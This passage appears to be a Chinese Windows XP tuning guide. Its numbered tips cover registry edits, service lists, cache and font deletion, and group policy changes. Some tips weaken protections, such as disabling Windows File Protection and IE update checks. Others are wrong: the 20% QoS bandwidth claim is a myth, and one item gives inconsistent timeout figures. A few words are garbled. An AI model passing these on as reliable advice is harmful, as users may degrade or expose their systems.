系统文件备份: 一般用户是不怎么用的,利用命令sfc.exe /purgecache删除。
备用的dll文件:在C:\Windows\system32\dllcache目录下。
输入法:在C:Windows\Ime文件夹下直接删除chtime、imjp8_1、imkr6_1三个目录即可,分别是繁体中文、曰文、韩文输入法。

29.删除WindowsXP中隐含的组件

          Windows XP在正常安装之后,会自动安装许多组件,这些组件有许多是平时用不到的,安装在系统中会占用很多空间,降低系统性能,我们可以用下述方法删除不用的组件。用记事本修改C:\Windows\Inf\目录下的Sysoc.inf文件,用查找/替换功能,在查找框中输入“,hide”(一个英文逗号紧跟hide),将“替换为”框设为空。并选全部替换,这样,就把所有的“,hide”都去掉了,存盘退出,再单击“开始/控制面板/添加或删除程序”,就可以看到许多平时见不到的组件,选择不需要程序进行删除即可。

30.清理垃圾文件

        Windows XP在正常的使用过程中会产生扩展名为TMP、BAK、OLD之类的垃圾文件,你可以用Windows的搜索功能,查出这些文件,然后把它们删除。另外Windows XP默认会在系统失败时记录错误事件,并写入调试信息,这些文件信息我们完全可以弃之不用。方法是单击“开始/控制面板/系统/高级/启动和故障恢复”,清空“将事件写入曰志文件”,在“写入调试信息”下拉框里选“无”即可。

31.禁止MSN随Windows启动

         每次启动Windows时,Messenger总是自动运行,即使你不想启动它,可是它也自动运行,非常烦人,我们能不能禁止它,不让它随Windows启动呢?回答是可以的。
第一种方法:
1.在“开始”菜单中单击“运行”,在“打开”框中输入“msconfig”,“确定”后打开“系统配置实用程序”窗口。
2.单击“启动”选项卡,在“启动项目”列表中,清除“MSMSGS”前的复选框,单击“确定”按钮。
3.当系统提示“重新启动计算机”时,请单击“是”按钮。
第二种方法:
1.打开“注册表编辑器”窗口。
2.依次展开“KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”分支,然后在右窗格中右键单击“MSMSGS”,再单击快捷菜单中的“删除”命令,当系统提示确认删除时,请单击“是”按钮。经过设置,MSN就再也不会随Windows XP的启动而启动了。

32.优化带宽

        Windows XP专业版新增了QoSRRP(这是Quality of Service Resource Reservation Protocol的缩写,意为服务质量资源预留协议)。一般来说,试图通过可用带宽访问信息的时候,应用程序要么通过QoS应用程序接口,要么通过另一个称为TCI的应用程序接口。在网络通讯上,为了商业方面的安全性保留了一定的频宽给了管理者,这对于QoS应用程序来说无疑是件好事,但是一般使用者便不需要此功能,无形中就有部分(默认为20%)带宽白白浪费了,因此我在此提供取消此功能的方法。选择“开始”菜单,点击“注销”,进到登录的主画面,在登录的主画面中按下Ctrl+Alt+Del两次出现了登录窗口,在使用者名称中输入Administrator(注:要区分大小),密码栏中填入自设密码(若没有设定密码者空白即可)按确定进入Windows,单击“开始/运行”输入gpedit.msc进入到“组策略”窗口,在左边窗口中选取“计算机配置/管理模板/网络/QoS数据包调度程序”,在右边的窗口中双击“限制可保留的带宽”,选择“已启用”并将“带宽限制(%)”设为0,单击“应用”,然后“确定”,重新启动即可。
注意:Windows XP家庭版的使用者不必更改这些设置。

33.删除多余字体

          Windows XP中安装的字体越多,就会占用更多的内存的系统资源,减慢系统的运行速度,因此,对于不常用的字体,我们最好把它从系统中删除。字体文件存放在C:\Windows\font目录下,你完全可以根据需要选择一些字体,对于更多不用的字体,一删了之。

34.更改IE临时文件夹

      上网时产生的大量临时文件都存放在IE临时文件夹中,默认情况下,临时文件夹是在系统分区上,大量的临时文件会影响硬盘读写系统文件的性能。你可以更改临时文件的位置来避免出现这种情况。方法是单击“开始/控制面板/Internet选项”,在“常规”选项卡中 单击“设置”按钮,在打开的窗口中单击“移动文件夹”按钮,指定一个非系统分区上的文件夹,单击“确定”后,临时文件就会移到指定的文件夹上。

35.加快“网上邻居”共享的速度

          不知道各位使用者用Windows XP开“网上邻居”里面的共享资源时,有没有发现所花的时间相当的长,这是因为它会检查其它计算机中的设定工作,有时甚至就在那边停了将近一分钟,相当讨厌,大家可以通过下面的方法将其检查的步骤取消:选择“开始/运行”,输入regedit,在弹出注册表编辑器中寻找

[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace],按鼠标右将在此位置的{D6277990-4C6A-11CF-8D87-00AA0060F5BF}删除之即可。
36.清除预读文件

       当Windows XP使用一段时间后,安装目录下的预读文件夹(C:\Windows\prefetch)里的文件会变的很大,里面会有死链接文件,这会减慢系统时间,建议你定期删除这些文件。

37.设置预读以提高速度

      Windows XP使用预读设置这一新技术,以提高系统速度。如果你的电脑配置不错,拥有PIII 800, 512M内存以上,你可以进行以下修改:单击“开始/运行”,输入“regedit”,打开注册表,找到[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher],设置数值0,1,2,3(0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读),推荐使用“3”,这样可以减少启动时间。

38.取消不需要的网络服务组件

        单击“开始/控制面板/网络连接/本地连接”打开本地连接状态窗口,单击“属性”按钮,打开属性对话框,单击“高级”选项卡,选中“通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络”选项,然后单击“设置”按钮,就可以看到所有已经安装的、Internet用户可以访问的、运行于你的网络上服务,除非你想架设FTP或SMTP服务器,否则不妨全部取消这些项目的选定状态。  

39.启用DMA传输模式

        所谓DMA,即直接存储器存储模式,指计算机周边设备(主要指硬盘)可直接与内存交换数据,这样可加快硬盘读写速度,提高速据传输速率。由于某些原因,Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式,而不是DMA模式。如果有这种情况,用户可以手动把IDE通道改为DMA模式,这样可以减少该设备占用的CPU周期。方法是:右键点击“我的电脑”,选“属性”,点选“硬件”选项卡,单击“设备管理器”按钮,打开“设备管理器”,然后点击展开“IDE ATA/ATAPI 控制器”分支,其中“IDE控制器”有两项“主要IDE通道”及“次要IDE通”,分别选中,依次进入“属性/高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,检查“传输模式”下拉菜单,把它们全部设“DMA(若可用)”,点击“确定”。

40.加快菜单显示速度

       选择“开始/运行”,输入regedit,弹出注册表编辑,寻找[HKEY_CURRENT_USER\ControlPanel\Desktop],在右边的窗口中选择MenuShowDelay,按鼠标右键,选择“修改”,将其数值资料改为100或更小(默认值为:400),建议不要使用0,因为如此一来只要鼠标一不小心触碰到“所有程序”,整条菜单就会跑出来,那这乱了套。

41.加快关机速度

       Windows XP的开机速度的确比以前版本的操作系统快了很多,但关机速度却慢了不少。如果你在意关机速度的快慢,可以修改几个注册表键值,就可以大大减少Windows关闭所用的时间。首先打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop\,里面有个名为HungAppTimeout的键,它的默认值是5000(如果不是,把它改为5000)。接下来,还有个WaitToKillAppTimeout键,把它的值改为4000(默认值是2000)。最后,找到注册表如下位置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\。同样地,把其中的WaitToKillServiceTimeout键值改为4000。另外,把“控制面板/管理工具/服务”中的NVidia Driver Help服务设为手动,也可以加快Windows关闭时间。

42.关闭计算机时自动结束任务

        在关机的时候,有时会弹出讨厌的对话框,提醒某个程序仍在运行,是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop 目录,把里面的AugoEndTasks键值改为1。
注意:可能会找不到AutoEndTasks键值,如果是这样的话,自己建一个串值并把它改为这个名字,值设为1就可以了。

43.关闭华生医生Dr.Watson

        单击“开始/运行”,输入“drwtsn32”命令,或者“开始/所有程序/附件/系统工具/系统信息/工具/Dr Watson”,调出系统里的华生医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。

44.减少磁盘扫描等待时间

       WindowsXP虽然号称稳定,但是并不是永不死机,偶尔也会给你个蓝脸,非法操作后系统会自动扫描,出现大段大段的E文,告诉你刚才系统非正常结束,现在需要检查一下是否出错,可是还要等待一段时间才开始,所以我们可以在dos下,键入“chkntfs/t:0”,表示等待时间为0秒。

45.删除多余的帐户

       如果你的电脑只有你一个人使用,最好只建自己的一个帐户,因为你每建一个帐户,就会在Windows XP的安装目录下的\documents and settings\下面多一个以你所建帐户为名的文件夹,里面存放着这个帐户的一些资料,有收藏夹、文档、历史记录,系统设置信息等内容,天长曰久它占用的空间也是不可小觑的,解决方法就是到“开始/控制面板/用户帐户”里依自己情况删除多余的帐户即可。

46.让系统自动关闭停止响应的程序

       单击“开始/运行”,输入regedit,弹出注册表编辑器,寻找[HKEY_CURRENT_USER\ControlPanel\Desktop],在右边的窗口中选择AutoEndTasks,按鼠标右键,选择“修改”,将其数值资料改为1(默认值为:0)。

47.IE网络浏览器加速技巧

        Windows XP自带Internet Explorer6,有个小技巧,修改之后启动得飞快(在我的机子上,简直是瞬间启动)。具体做法是:右键点击Internet Explorer快捷图标(如任务栏上的快捷启动栏中那个IE图标),打开图标属性之后在“目标”后面加上“-nohome”参数即可。

48.加密文件和文件夹

       在任何需要加密的文件和文件夹上右键单击鼠标,选择“属性”命令,单击“常规”选项卡,然后依次选择“高级加密内容以便保护数据”后确定就可以了。需要说明是 :Windows XP的加密操作只针对NTFS格式的磁盘分区,它对传统的FAT16和FAT32格式的分区不提供加密支持,如果你想使用加密操作,就需要把磁盘转换为NTFS格式。

49.自定义文件夹图片

         在Windows XP中新增了文件夹图片功能,它提供了比原来的图标内容更多丰富的图片资源供用户选择,你可以利用这一功能把自己喜欢的任意图片设为文件夹图标,方法是:在资源管理器选中任一文件夹,右键单击,选择“属性”命令,在打开的对话框中选择“自定义”选项卡,单击“选择图片”按钮选择作为文件夹图片的图形文件,单击“更改图标”按钮可以文件夹图标,然后单击“确定”即可,以后你在资源管理器中选择以“缩略图”形式查看文件时,就可以看到你定义的文件夹图片。

50.快速移动和复制文件

        在资源管理器中选中你要移动或复制的文件,然后用鼠标右键将文件拖动目的文件夹后松开,会弹出一个菜单,允许你选择复制、移动文件还是创建一个快捷方式,甚至可以取消。

51.自动打开Windows资源管理器

       有些情况下,借助Windows资源管理器来浏览文件夹要比直接打开每个文件夹并查看其中内容更加直观方便。一般我们可以在文件夹上单击鼠标右键并从中选择资源管理器,然而如果你有双击鼠标的操作习惯,那么我们还能够以更加快捷的方式打开文件夹。首先打开我的电脑,从工具菜单中选择“文件夹选项”,单击“文件类型”选项卡。在文件类型列表中,选择“文件夹”并单击“高级”按钮,在编辑文件类型对话框中,选择资源管理器,并单击“设为默认值”按钮。单击“确定”之后,再单击关闭。现在,当你在任意文件夹上进行双击时,将自动打开Windows资源管理器视图。


52.向隐藏的垃圾箱中删除文件

          Windows XP垃圾箱的默认位置是在桌面的右下角,在底部系统托盘的上面。如果用户打开多个窗口,则会挡住垃圾箱,使用户无法拖曳文件及文件夹至垃圾箱。为此,微软专门做了非常人性化的设计,当用户拖动一批文件并移至桌面右下角时,用户可以拖动鼠标并将所有文件移至桌面最下方任务条的空白区域,并在那里停留几秒钟,届时所有打开的窗口将会自动最小化,从而允许用户将文件拖至垃圾箱。另外,无论打开的多个窗口是否最大化,用户执行上述操作均可以实现让所有窗口最小化的效果。


53.设置共享文件夹的权限

          Windows 2000操作系统中用户在设置文件夹的共享属性时操作非常简便,只需用鼠标右击该文件夹并选择属性,就可以找到共享设置标签,来设置文件夹的访问权限,只允许特定用户访问,可在Windows XP中却找不到这个功能了。难道在Windows XP中不能使用这个功能吗?其实不然,你可以这样操作:打开“我的电脑”中的“工具”,选择“文件夹属性,调出“查看”标签,在“文件和文件夹”部分将 “使用简单文件共享(推荐)”项前面的选择取消,这样修改后用户就可以象使用Windows 2000一样对文件夹属性进行方便修改了。

54.快速拷贝文件

             我们一般都是过一段时间就把硬盘上的文件分类整理一下,把图片放在picture文件夹中,mp3文件放在music文件夹中等等,但来回复制、粘贴真的很烦琐,现在让我们用一个简单的方法快速拷贝文件。选中一个文件夹如music,点鼠标右键创建一个快捷方式,复制这个快捷方式,在C:\Documents and Settings\用户名\SendTo文件夹中粘贴此快捷方式。
SendTo是WindowsXP的系统文件夹,“发送到”功能就是由它来实现的。现在我们选中任意一个mp3,点鼠标右键在发送到中选择“快捷方式到music”,这个mp3文件就被复制到了music文件夹中,是不是很方便!我们还可以根据自己的需要制作software、txt等等。


55.定制你文件夹的新图标

     某个目录对你很重要吗?让它有个与众不同的图标吧,这样辨认起来也容易。用记事本在你的目录内新建一个文件,文件名叫作Desktop.ini,将下面这两行输进去:
[.ShellClassInfo]
IconFile=
Iconindex=
IconFile就是你的图标文件,可以采用.ico、.exe、.dll翟烩类有图标的文件充当。写下绝对或相对路径都可以,Iconindex是选择哪一个图标,如果你指定的EXE或者DLL中包含不止一个图标,那就需要选择了,如果你想使用第一个图标,就写上Iconindex=0就可以了,在没有该行定义的情况下,默认是使用第四个图标,即Iconindex=3,这就是好多时候ICO显示不出的原因(里面只有一个图标呀),接着请到DOS下将这个目录设置为系统属性,方法是:ATTRIB+S 文件夹,快按下F5刷新吧,一个全新的图标就代表你的文件夹。

56.彻底隐藏文件

          每个人的机器上都或多或少有一点不愿意别人看见的东西,怎么办,直接隐藏起来吗?一打开显示隐藏文件就什么都看见了,其实你只要在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
explorer\Advanced\Folder\Hidden\SHOWALL下, DWORD值Checkedvalue设为0(如果没有这一项可新建一个),这样当有非法用户开启显示隐藏文件功能后,你的文件也不会被显示出来。

57.取消共享文档

       默认情况下,在Windows XP中打开我的电脑,会看到在硬盘图标上方有一些文件夹。这些就是“共享文件夹”,这里有每一个用来户共享文件所用的文件夹。我们可以让这些文件夹在我的电脑中消失,原理很简单,只要打开注册表找到如下位置:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\MyComputer\NameSpace\DelegateFolders,把{59031a47-3f72-44a7-89c5-5595fe6b30ee}键值删掉,下次打开我的电脑,这些烦人的文件夹就不复存在了。

58.按指定文件夹启动资源管理器

        在Windows XP中,可以使用“资源管理器”和“我的电脑”管理文件和文件夹,但本人更偏爱使用“资源管理器”。因为利用“目录树”的结构方式,可以快速找到所需文件或文件夹,如果是复制或移动文件或文件夹,那就更方便了。可是在默认情况下,每次定位于“资源管理器”时总是打开“我的文档”文件夹,能不能自己指定一个文件夹呢?首先在“开始/所有程序/附件”中找到“资源管理器”,在“资源管理器”上单击右键,选择右键菜单中的“属性”命令,在“快捷方式”选项卡中,目标文本框内容是“%SystemRoot%explorer.exe”(如果你的Windows XP安装在C盘,应该是“c:Window说什么explorer.exe”),只要略作一下修改,就可满足要求了。例如我经常打开的是h盘中的user文件夹,将目标文本框内容修改为“%SystemRoot%explorer.exe /e,h:user”,在“exe”与“/e”之间一定要加上一个空格。好!大功告成了,现在你再打开“资源管理器”,就直接进入了user文件夹了。另外还有一种解决方法呢,还是以启动“user”文件夹为例,首先在桌面上为文件夹“user”建立快捷启动方式,单击右键,在弹出菜单中选择“资源管理器”命令,打开“资源管理器”后就直接进入了“user”文件了。

59.在任务栏上显示星期与曰期

         这个其实不需设置,只要将任务栏拉高一点就可以了。方法是:将鼠标移到屏幕下边的任务栏的上边线位置,当鼠标指标变成双箭号时,按下左键,往上拖拉至两行高位置即可。系统托盘处即显示时间,曰期及星期。
注意:因Windows XP预设是将任务栏锁住的,所以你可能将鼠标移至任务栏边界时,鼠标并不会变形,表示不让你拖拉。这时请先在任务栏空白处单击鼠标右键,将其快显菜单中的“锁定任务栏”前的勾去掉。

60.快速锁定计算机

         如果你因为有急事而需要离开,但又不希望电脑进行系统注销。这时你可以选择“新建/快捷方式”,接着系统便会启动创建快捷方式向导,在文本框中输入rundll32.exe user32.dll,LockWorkStation,单击“下一步”,在弹出的窗口中输入快捷方式的名称。比如我们可将它命名为“锁定计算机”或选用你所喜欢的任何名称,单击“完成”。以后,我们就可以简单地点击这个快捷方式,锁定计算机。

61.禁止IE的定期更新

        在我们上网以后,Windows XP经常会在任务栏上弹出一个提示你升级系统文件的消息,其实这是IE浏览器的定期更新检查在作怪,大约每30天左右,Windows XP系统附带的IE6.0就会定期检查是否有新的升级软件,如果有,你没有下载升级,便会弹出上述提示对话框,我们可以采用下面的方法来禁止IE6.0的定期更新检查:打开“运行”对话框,输入“gpedit.msc”,打开“组策略”设置窗口,在左边的树形目录中找到“计算机配置/管理模板/Windows组件/Internet Explorer”,在右边的窗口中找到“禁用定期检查Internet Explorer软件更新”选项,打开该选项,在出现的窗口中选择“已启动”,最后单击“确定”按钮即可。

62.找回XP的安装密码

      在9X时代,如果忘记了Windows的安装密码,只要到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion,察看一下ProductKey就可以了,可是在XP的注册表中怎么找不到呢?其实不需要到注册表中,打开Windows\System32,这儿有个叫$winnt$的配置文件,里面已经有清楚的记载了。

63.IE的全屏幕模式

       一般都知道,在IE里按下F11键就可以快速切换到全屏幕模式,不过我们这里所说的全屏幕模式是指一个不包括工具栏、状态栏的纯全屏模式。要达到这种效果,启动IE时需加上一个参数,在命令行里输入C:/Program Files/Microsoft Internet/IEXPLORE.EXE -k,就可以打开一个全屏幕的IE了。

64.与Internet时间同步

      不知你是否注意到现在有许多软件都可以让你电脑的时钟变得准确,其原理就是该软件选择一个服务器,当你上网的时候电脑内的时钟与服务器的时钟相比较,如果不准确的话就可以自动调整过来。而如今在Windows XP也集成了这一功能。我们可以双击任务栏右下角的时钟,在“Internet时间”中进行调整。需要注意的是:如果你的电脑安装了防火墙,那么很有可能不能进行Internet时间调整。

65.禁止隐藏不活动的图标

         在使用一段时间后,Windows XP会自动检测并隐藏不活动的图标,我们可以通过下面的方法来禁止它:在任务栏的空白处单击鼠标右键,在弹出的快捷菜单中选择“属性”,在“任务栏”标签中将“隐藏不活动的图标”取消即可,如果你不想完全禁止这项功能,可以单击“自定义”按钮,自行设置有关项目的隐藏和显示。

66.使每次打开IE时的窗口都是最大化

       通过快捷方式启动IE,例如通过快速启动工具栏中的图标启动IE时,您可以右击“快捷方式图标”,选择“属性”,在“快捷方式”选项卡中的“运行方式”选项栏中选择“最大化”,然后单击“确定”按钮。此后,无论什么时候您通过这个快捷方式启动IE,浏览器的窗口总处于最大化状态。通过桌面的“Internet Explorer”图标启动IE时,因为这不是一个标准的快捷方式,所以没有最大化选项。幸运的是,这个图标可以记住最近一次您使用浏览器的窗口的设置情况。因此,如果当您退出IE前将窗口最大化,那么下次启动IE时仍然会保持此次退出时的窗口设置。

67.让欢迎窗口更清晰

        Windows XP系统的显示效果得到了较大提高,这主要是基于它使用了名“ClearType”的清晰化技术,该技术特别让使用笔记本电脑及液晶显示器的用户在运行Windows XP操作系统时感受到与以往系统不同的效果。但由于该清晰效果只有当Windows启动完毕后才能调用,因此在系统启动过程中的欢迎窗口仍然无法实现这一效果。为了使欢迎窗口更加清晰,用户可以使用注册表编辑器进行修改,寻找到这两个主键:
HKEY_USERS\.Default\Control Panel\Desktop\FontSmoothing
HKEY_USERS\.Default\Control Panel\Desktop\FontSmoothingType
将键值修改为“2”,这样便可以实现清晰显示效果了。

68.屏蔽弹出的广告窗口

        当你打开一个网站就会发现也弹出另一个广告页面,页面开多了,电脑运行速度就会大大地变慢。一些禁止弹出广告页面(俗称“黑名单”)的软件就应运而生,其实在Windows XP自带的IE6.0中也有禁用黑名单的功能,打开浏览器,单击“工具/Internet选项/安全”,打开“安全”页面,在“安全设置”中选择“受限制的站点”,并点击“站点”按钮,在弹出的窗口中输入禁止弹出广告页面的地址,再单击“添加”,“确定”,讨厌的广告窗口就不见了!

69.恢复桌面上的系统图标

         通常很多用户还是习惯于在桌面上保留“我的文档”及其它经常访问文件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标,只需进行如下操作:在桌面点击鼠标右键,在右键菜单中选择“属性”命令,在打开的“显示 属性”对话框中选择“桌面”选项卡,单击“自定义桌面”按钮,打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所需项目的复选框,然后单击“确定”返回上一级对话框,再单击“应用”按钮即可。

70.设定系统异常停止时Windows XP的对应策略

     我们还可以在系统正常时,设定当系统出现异常停止时,Windows XP的反应措施,比如我们可以指定计算机自动地重新启动,步骤如下:鼠标右键单击“我的电脑”,在弹出的快捷菜单中选择“属性”,打开“系统属性”设置窗口,选择“高级”标签,打开“高级”选项卡,在“启动和故障恢??”选项区域中单击“设置”按钮,打开“启动和故障恢复”对话框,在“系统失败”选项区域中,通过启用复选框可以选择系统失败后的应对策略,在“写入调试信息”选项区域中可以设置写入系统调试信息时的处理方法,设置完毕,单击“确定”按钮返回“系统属性”对话框,再单击“确定”按钮。


 

71.采用Windows 98/2000的窗口风格

有些人可能不喜欢Windows XP的窗口风格,想恢复原来的Windows 98/2000的界面,怎么办?在桌面空白处单击鼠标右键,在快捷菜单中选择“属性”,在弹出的窗口中选择“主题”标签,从“主题”的下拉菜单中选择“Windows经典”,然后选择确定就可以了。

72.添加“显示桌面”项

在默认安装下,我们在任务栏中找不到熟悉的“显示桌面”按钮,难道Windows XP中没有这个非常好的功能了吗?其实不是,你依次单击“开始/设置/控制面板/任务栏和开始菜单”,在“任务栏和开始菜单属性”窗口中,将“显示快速启动”选项打上勾,“显示桌面”项就会出现在任务栏中了。

73.隐藏桌面图标

在Windows XP中增加了隐藏桌面图标的功能,你只需用鼠标单击桌面空白处,在弹出的右键菜单中选定“排列图标”命令,然后在其下一级级联菜单中取消对“显示桌面图标”命令的选定,系统就会自动将所有桌面图标隐藏。

74.取消快捷方式图标上的箭头

当你安装一些软件后,通常Windows XP桌面上会被放置一些快捷方式图标,可以让方便地启动应用程序。只是这些应用程序的快捷方式图标上出现的黑色箭头,非常影响桌面美观。如果你想将黑色箭头去除,只需进行如下操作:
打开注册表编辑器,进入HKEY_CLASSES_ROOT\Lnkfile子键分支,在此子键分支中查找到键值名IsShortcut,其类型为REG_SZ,将此值删除,就能去除快捷方式图标上的箭头。注销当前用户并重新启动计算机后设置就生效。

75.快速打开控制面板

把鼠标移动到“开始”按钮上,点鼠标右键,选择“属性/自定义/高级/开始菜单项目”
,在“控制区面板”项目下选中“显示为菜单”(图10),然后单击“确定”就行了,您
以后就可以像打开程序一样在“开始”菜单中打开一个控制面板的项目,很节约时间。

76.将所喜爱的程序放置在开始菜单顶部附近

你是否对某个程序非常喜爱且经常使用呢?那么,应通过将其放置在列表顶部的方式提高它在开始菜单中的优先级。这种方式能够确保该程序保持在开始菜单中,且不受其它程序的干扰,即便其它程序具有更高的使用频率也是如此。
在开始菜单上右键单击指向你所喜爱程序的链接,并在随后出现的快捷菜单中选择“附到‘开始’菜单”上。你的程序将被永久移动到列表顶部,仅仅位于浏览器与电子邮件程序下方。

77.去掉桌面图标文字的阴影

以前版本的Windows在用自定义桌面的时候,图标的文字下面都有阴影(就是你的桌面颜色),影响了桌面的视觉效果。原来只能借助其他软件解决,但是性能不稳定,又占用系统资源。Windows XP帮你解决了这个问题!只要你打开电脑属性——先用右键单击“我的电脑”,在弹出的菜单中选“属性”,然后在“高级”选项卡中的“性能”框中点“设置
”按钮,在“视觉效果”页中 将“在桌面上为图标标签使用阴影”前面的方框打上钩。单击“确定”返回系统属性,再单击“确定”返回桌面。看看你桌面上的图标,已达到你梦寐以求的效果了!这样既能获得好的视觉效果,又能节省系统资源。

78.自动关闭电脑

安装完Windows XP之后,有些计算机在点击关闭电脑之后并不能自动关闭,而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。修正的方法是:点击“开始/控制面板/性能和维护/电源选项”。在弹出的电源选项属性设置窗口中,点击“高级电源管理”,将“启用高级电源管理支持”打上勾。

79.备份硬件配置文件

硬件配置文件可在硬件改变时,指导Windows XP加载正确的驱动程序,如果我们进行了一些硬件的安装或修改,就很有可能导致系统无法正常启动或运行,这时我们就可以使用硬件配置文件来恢复以前的硬件配置。建议用户在每次安装或修改硬件时都对硬件配置文件进行备份,这样可以非常方便地解决许多因硬件配置而引起的系统问题。备份的步骤如下:鼠标右键单击“我的电脑”,在弹出的快捷菜单中选择“属性”命令,打开“系统属性”对话框,单击“硬件”标签,在出现的窗口中单击“硬件配置文件”按钮,打开“硬件配置文件”对话框,在“可用的硬件配置文件”列表中显示了本地计算机中可用的硬件配
置文件清单,在“硬件配置文件选择”区域中,用户可以选择在启Windows XP时(如有多个硬件配置文件)调用哪一个硬件配置文件。要备份硬件配置文件,单击“复制”按钮,在打开的“复制配置文件”对话框中的“到”文本框中输入新的文件名,然后单击“确定
”按钮即可。

80.缩短等待时间

打开注册表编辑器,找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,将 WaitToKillServiceTimeout 设为:4000(原设
定值:20000)。找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边窗口的 WaitToKillAppTimeout 改为 4000(原设定值:
20000),即关闭程序时仅等待1秒。将 HungAppTimeout 值改为:2000(原设定值:5000),表示程序出错时等待0.5秒。

81.让系统自动关闭停止响应的程序

打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键,将 AutoEndTasks 值设为 1(原设定值:0)。

82.加速共享查看

打开注册表编辑器,把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Explorer\RemoteComputer\NameSpace下的 {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 删掉

83.优化“启动和故障恢复”设置:
右键单击“我的电脑”,点击属性,点击“高级”,在“启动和故障恢复”一栏中,点击“设置”,其中的“系统失败”一栏中,只选择“自动重新启动”,写入调试信息选择“无”。

84.关闭华医生Dr.Watson:

在开始->运行中输入drwtsn32命令,或者开始->程序->附件->系统工具-
>系统信息->工具->Dr Watson,调出系统里的华
医生Dr.Watson ,只保留转储全部线程上下文选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。

85.关掉快速切换功能:

方法如下:控制面板 >用户帐户,点击“更改用户登陆或注销方式”,去掉“使用快速
用户切换”就可以了。

86.定制特殊的启动提示
注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon中的LegaNoticeCaption是登陆提示语言,“LegalNoticeText”是欢迎词。

87.关闭windows的文件保护
默认状态下是无法删除windows系统和程序文件的,所以警告!!!!!!!!!!!!!!!! 注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Curren tVersion \winlogon 中的“SFCDisable”将它的值改为“ffffff9d”

88.windowsXP的内存优化!!!!!!!!!!!!(警告!!!!!以下设置需要有256M以上的内存才能有
好的效果!!!)
注册表:
HKEK_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management中的:禁用内存页面调度: DisablePagingExecutive 值改为“1”
提升系统缓存: LargeSystemCache 值改为“1”

89.修改磁盘缓存以加速xp

  磁盘缓存对xp运行起着至关重要的作用,但是默认的I/O页面文件比较保守。所以,对于不同的内存,采用不同的磁盘缓存是比较好的做法。

a.)运行 regedit;

b.)去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit];

c.)根据你的内存修改其十六进制值:
64M: 1000;
128M: 4000;
256M: 10000;
512M或更大: 40000.

d.)重启

90.减少磁盘扫描等待时间
在dos下,键入“chkntfs/t:0”


91.解除带宽限制
运行 gpedit.msc -管理模版 -网络 QoS数据包调度程序 -限制可保留带宽 -启动 -下面输入 0 确定 -在你的拨号图标右健属性找到网络 -看看有没有QoS
数据包调度程序 -如果没有点安装 -服务 添加 选QoS数据包调度程序 看
看有没有打勾 有就代表成功了 重启 -ok!


92.取消系统休眠支持
右键属性-屏幕保护程序-电源-休眠-取消

93.关掉视频预览
运行一下这个命令:“REGSVR32 /U SHMEDIA.DLL”


94.不能关闭的服务(或者一般不宜关闭的服务)
windows audio声音
cryptographic services -windows更新时用来确认windows 文件指纹的,我更新时才开
启一下
DHCP client-静态IP者需要
Logical Disk manager -磁盘管理服务
*Event Log - 系统曰志纪录服务,很有用于查找系统毛病
COM+Event system application一些 COM+ 软件需要,检查你的 c:\program

files\ComPlus Applications 目录,没东西可以把这个服务关
*Workstation -很多服务都依靠这个服务,支持联网和打印/文件共享的
Machine Debug Manager
Network Connections - 上网/局域网要用
*Plug and Play - 即插即用
Protected Storage-储存本地密码和网上服务密码的服务,包括填表时的“自动完成”

功能
*Remote Procedure Call (RPC) -系统核心服务
security accounts manager-像 Protected Storage, IIS Admin 才需要
system event notification-记录用户登录/注销/重起/关机信息
shell hardware detection-给有些配置自动启动,像内存棒,和有些cd驱动等
Print Spooler -打印机用的
themes -给xp打扮的东东
*Windows Management Instrumentation - 满重要的服务,是管"服务依靠"的

95.卸载无用的动态链接

  资源管理器经常在内存中留下无用的动态链接,为了消除这种现象,你可以打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL(字符串值)将其设为1

96.在关机时清空页面文件
打开“控制面板”,点击“性能和维护”-“管理工具”→“本地安全策略”→“本地策略”→“安全选项”,双击其中“关机:清理虚拟内存页面文件”一项,点击弹出选单中的“已启用”选项,单击“确定”即可

97.Windows XP 安装好后,如何把FAT 32转化为NTFS

  使用convert命令,在命令行模式下用convert.exe这个命令随时转化的。例如:convert c: /fs:ntfs把c盘转化为NTFS

98.验证Windows XP是否已激活

  在运行中输入“oobe/msoobe /a”;版本号可以通过WINDOWS(XP安装目录)system32/NTOSKRNL.EXE,鼠标右键 -> 选内容查看即可

99、删除Windows XP中不需要的组件

1)、删除系统文件备份,执行sfc.exe /purgecache

